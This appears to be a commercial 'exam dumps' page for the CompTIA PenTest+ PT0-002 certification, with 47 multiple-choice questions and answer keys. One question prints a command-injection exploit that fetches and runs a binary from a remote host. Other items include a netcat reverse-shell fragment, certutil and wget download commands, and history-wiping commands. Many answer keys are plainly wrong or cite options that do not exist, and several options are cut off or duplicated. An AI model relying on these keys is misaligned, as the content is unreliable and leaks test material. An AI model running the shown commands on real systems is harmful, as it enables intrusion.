
CompTIA PT0-002 Exam Success: Mock Tests & Study Resources, CompTIA PenTest+ Certification | SPOTO

Prepare for success in your CompTIA PenTest+ (PT0-002) certification exam with our Mock Tests & Study Resources. The best way to prepare for the exam is by practicing the latest exam questions. Our study materials include practice tests, sample questions, exam dumps, and exam questions and answers, designed to help you achieve success. The CompTIA PenTest+ certification is ideal for cybersecurity professionals tasked with penetration testing and vulnerability management. With access to our mock exams and exam simulator, you can simulate real exam conditions and boost your confidence. Utilize our exam materials and exam answers to reinforce your understanding and readiness for the PT0-002 exam. Prepare with confidence and achieve exam success with our comprehensive study resources and mock tests.


Question #1
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
A. Nmap
B. tcpdump
C. Scapy
D. hping3
Correct Answer: C
Question #2
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
A. certutil -urlcache -split -f http://192
B. powershell (New-Object System
C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
D. wget http://192
Correct Answer: A
Question #3
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?
A. Redirecting Bash history to /dev/null
B. Making a copy of the user's Bash history for further enumeration
C. Covering tracks by clearing the Bash history
D. Making decoy files on the system to confuse incident responders
Correct Answer: A
Question #4
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?
A. nmap -f -sV -p80 192
B. nmap -sS -sL -p80 192
C. nmap -A -T4 -p80 192
D. nmap -O -v -p80 192
Correct Answer: A
Question #5
Given the following code: Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
A. Web-application firewall
B. Parameterized queries
C. Output encoding
D. Session tokens
E. Input validation
F. Base64 encoding
Correct Answer: BE
Question #6
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
- The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
- Network management interfaces are availab
A. Enforce enhanced password complexity requirements
B. Disable or upgrade SSH daemon
C. Disable HTTP/301 redirect configuration
D. Create an out-of-band network for management
E. Implement a better method for authentication
F. Eliminate network management and control interfaces
Correct Answer: CD
Question #7
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees' numbers?
A. Web archive
B. GitHub
C. File metadata
D. Underground forums
Correct Answer: A
Question #8
An executive needs to use Wi-Fi to connect to the company's server while traveling. Looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive MOST likely experiencing?
A. Data modification
B. Amplification
C. Captive portal
D. Evil twin
Correct Answer: D
Question #9
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information?
A. Create a custom password dictionary as preparation for password spray testing
B. Recommend using a password manager/vault instead of text files to store passwords securely
C. Recommend configuring password complexity rules in all the systems and applications
D. Document the unprotected file repository as a finding in the penetration-testing report
Correct Answer: D
Question #10
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
A. Send deauthentication frames to the stations
B. Perform jamming on all 2
C. Set the malicious AP to broadcast within dynamic frequency selection channels
D. Modify the malicious AP configuration to not use a pre-shared key
Correct Answer: B
Question #11
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following BEST describes what happened?
A. The penetration tester was testing the wrong assets
B. The planning process failed to ensure all teams were notified
C. The client was not ready for the assessment to start
D. The penetration tester had incorrect contact information
Correct Answer: C
Question #12
Which of the following is the most common vulnerability associated with IoT devices that are directly connected to the internet? IoT devices are often shipped with default passwords, which are easily discoverable and widely known. Many users fail to change these default credentials, leaving the devices vulnerable to unauthorized access. This issue is one of the most common vulnerabilities associated with IoT devices connected directly to the internet. Attackers can exploit these default passwords to gain co
A. Unsupported operating systems
B. Susceptibility to DDoS attacks
C. Inability to network
D. The existence of default passwords
Correct Answer: D
Question #13
A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
Correct Answer: D
Question #14
Which of the following expressions in Python increase a variable val by one? (Choose two.)
A. val++
B. +val
C. val=(val+1)
D. +val
E. val=val++
F. val+=1
Correct Answer: C
Question #15
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
A. Buffer overflows
B. Cross-site scripting
C. Race-condition attacks
D. Zero-day attacks
E. Injection flaws
F. Ransomware attacks
Correct Answer: C
Question #16
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
A. Create a one-shot systemd service to establish a reverse shell
B. Obtain /etc/shadow and brute force the root password
C. Run the nc -e /bin/sh <
D. Move laterally to create a user account on LDAP
Correct Answer: B
Question #17
Which of the following best explains why communication is a vital phase of a penetration test? Communication is a vital phase of a penetration test to ensure all parties involved are aware of the test's progress, findings, and any potential impact on business operations. Discussing situational awareness involves sharing real-time insights about the security posture, any vulnerabilities found, and potential risks. This enables the organization to make informed decisions, mitigate risks promptly, and ensure t
A. To discuss situational awareness
B. To build rapport with the emergency contact
C. To explain the data destruction process
D. To ensure the likelihood of future assessments
Correct Answer: A
Question #18
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?
A. Cross-site request forgery
B. Server-side request forgery
C. Remote file inclusion
D. Local code inclusion
Correct Answer: B
Question #19
A penetration tester conducted a discovery scan that generated the following: Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?
A. nmap -oG list
B. nmap -sn 192
C. nmap --open 192
D. nmap -o 192
Correct Answer: AC
Question #20
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities
Correct Answer: D
Question #21
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
A. Ensure the client has signed the SOW
B. Verify the client has granted network access to the hot site
C. Determine if the failover environment relies on resources not owned by the client
D. Establish communication and escalation procedures with the client
Correct Answer: A
Question #22
A penetration tester is reviewing the following SOW prior to engaging with a client: "Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner." Based on the information in the SOW, which of the following behavior
A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
D. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address
E. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
F. Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
Correct Answer: CD
Question #23
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
A. devices produce more heat and consume more power
B. devices are obsolete and are no longer available for replacement
C. protocols are more difficult to understand
D. devices may cause physical world effects
Correct Answer: D
Question #24
A penetration tester obtained the following results after scanning a web server using the dirb utility:
...
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
...
DOWNLOADED: 4612 - FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration tester?
A. index
B. about C
Correct Answer: AC
Question #25
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows: The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
Network management interfaces are available on the production n
A. Enforce enhanced password complexity requirements
B. Disable or upgrade SSH daemon
C. Disable HTTP/301 redirect configuration
D. Create an out-of-band network for management
E. Implement a better method for authentication
F. Eliminate network management and control interfaces
Correct Answer: AE
Question #26
A penetration tester wrote the following script to be used in one engagement: Which of the following actions will this script perform?
A. Look for open ports
B. Listen for a reverse shell
C. Attempt to flood open ports
D. Create an encrypted tunnel
Correct Answer: A
Question #27
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?
A. Comma
B. Double dash
C. Single quote
D. Semicolon
Correct Answer: C
Question #28
A penetration tester managed to exploit a vulnerability using the following payload: IF (1=1) WAIT FOR DELAY '0:0:15' Which of the following actions would best mitigate this type of attack? The payload used by the penetration tester is a type of blind SQL injection attack that delays the response of the database by 15 seconds if the condition is true. This can be used to extract information from the database by asking a series of true or false questions. To prevent this type of attack, the best practice is
A. Encrypting passwords
B. Parameterizing queries
C. Encoding output
D. Sanitizing HTML
Correct Answer: B
Question #29
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)
A. Open-source research
B. A ping sweep C
E. A vulnerability scan
F. An Nmap scan
Correct Answer: B
Question #30
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
A. A signed statement of work
B. The correct user accounts and associated passwords C
Correct Answer: B
Question #31
Given the following output:
User-agent: *
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?
A. Website scraping
B. Website cloning
C. Domain enumeration
D. URL enumeration
Correct Answer: CF
Question #32
While performing an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue? The best way to mitigate this issue is to implement patching and change control programs, which are processes that involve applying updates or fixes to software packages to address vulnerabilities, bugs, or performance issues, and managing or documenting the changes made to the software pa
A. Implementation of patching and change control programs
B. Revision of client scripts used to perform system updates
C. Remedial training for the client's systems administrators
D. Refrainment from patching systems until quality assurance approves
Correct Answer: A
Question #33
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)
A. Wireshark
B. Nessus
C. Retina
D. Burp Suite
E. Shodan
F. Nikto
Correct Answer: AC
Question #34
Appending string values onto another string is called:
A. compilation
B. connection
C. concatenation
D. conjunction
Correct Answer: A
Question #35
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?
A. Implement a recurring cybersecurity awareness education program for all users
B. Implement multifactor authentication on all corporate applications
C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy
D. Implement an email security gateway to block spam and malware from email communications
Correct Answer: A
Question #36
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/
B. rm -rf /tmp/apache C
Correct Answer: D
Question #37
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?
A. As backup in case the original documents are lost
B. To guide them through the building entrances
C. To validate the billing information with the client
D. As proof in case they are discovered
Correct Answer: A
Question #38
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network
B. Supervisors and controllers are on a separate virtual network by default
C. Controllers will not validate the origin of commands
D. Supervisory systems will detect a malicious injection of code/commands
Correct Answer: C
Question #39
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?
A. Reach out to the primary point of contact
B. Try to take down the attackers
C. Call law enforcement officials immediately
D. Collect the proper evidence and add to the final report
Correct Answer: CE
Question #40
A penetration tester is enumerating shares and receives the following output: Which of the following should the penetration tester enumerate next? The output displayed is typical of what one might see when using a tool like smbclient or enum4linux to list shared directories on a system that uses the SMB (Server Message Block) protocol. Here's a brief overview of the shared resources that have been found: 1. print$ - This share is generally used for printer drivers. 2. home - Could be a user's home director
A. dev
B. print$
C. home
D. notes
Correct Answer: A
Question #41
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
A. Windows
B. Apple
C. Linux
D. Android
Correct Answer: A
Question #42
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU
Correct Answer: C
Question #43
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?
A. RFID cloning
B. RFID tagging
C. Meta tagging
D. Tag nesting
Correct Answer: D
Question #44
Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?
A. Dictionary
B. Directory
C. Symlink
D. Catalog
E. For-loop
Correct Answer: A
Question #45
The following PowerShell snippet was extracted from a log of an attacker machine: A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?
A. Line 8
B. Line 13
C. Line 19
D. Line 20
Correct Answer: A
Question #46
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)
A. The libraries may be vulnerable
B. The licensing of software is ambiguous C
E. The libraries may be unsupported
F. The libraries may break the application
Correct Answer: B
Question #47
A consultant is reviewing the following output after reports of intermittent connectivity issues:
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 01:02:5e:7
A. A device on the network has an IP address in the wrong subnet
B. A multicast session was initiated using the wrong multicast group
C. An ARP flooding attack is using the broadcast address to perform DDoS
D. A device on the network has poisoned the ARP cache
Correct Answer: AE
